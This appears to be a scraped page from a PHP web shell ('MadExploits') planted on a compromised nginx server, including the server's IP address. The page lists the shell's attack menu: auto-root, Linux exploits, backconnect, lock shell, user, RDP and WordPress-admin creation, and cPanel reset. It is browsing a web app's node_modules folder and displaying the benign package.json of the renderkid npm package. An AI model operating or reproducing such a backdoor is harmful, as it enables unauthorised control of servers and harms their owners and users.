Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
renderkid /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
90
B
-rw-rw-rw-
LICENSE
1.05
KB
-rw-rw-rw-
README.md
3.41
KB
-rw-rw-rw-
SECURITY.md
215
B
-rw-rw-rw-
package.json
1.11
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "renderkid", "version": "3.0.0", "description": "Stylish console.log for node", "main": "lib/RenderKid.js", "dependencies": { "css-select": "^4.1.3", "dom-converter": "^0.2.0", "htmlparser2": "^6.1.0", "lodash": "^4.17.21", "strip-ansi": "^6.0.1" }, "devDependencies": { "@babel/core": "^7.14.5", "@babel/preset-env": "^7.14.5", "chai": "^4.3.4", "chai-changes": "^1.3.6", "chai-fuzzy": "^1.6.1", "coffeescript": "^2.5.1", "mocha": "^9.1.3", "sinon": "^11.1.1", "sinon-chai": "^3.7.0" }, "scripts": { "test": "mocha \"test/**/*.coffee\"", "test:watch": "npm run test -- --watch", "compile": "coffee --bare --transpile --output ./lib ./src", "compile:watch": "coffee --watch --bare --transpile --output ./lib ./src", "watch": "npm run compile:watch & npm run test:watch", "prepublish": "npm run compile" }, "repository": { "type": "git", "url": "https://github.com/AriaMinaei/RenderKid.git" }, "bugs": { "url": "https://github.com/AriaMinaei/RenderKid/issues" }, "author": "Aria Minaei", "license": "MIT" }
Close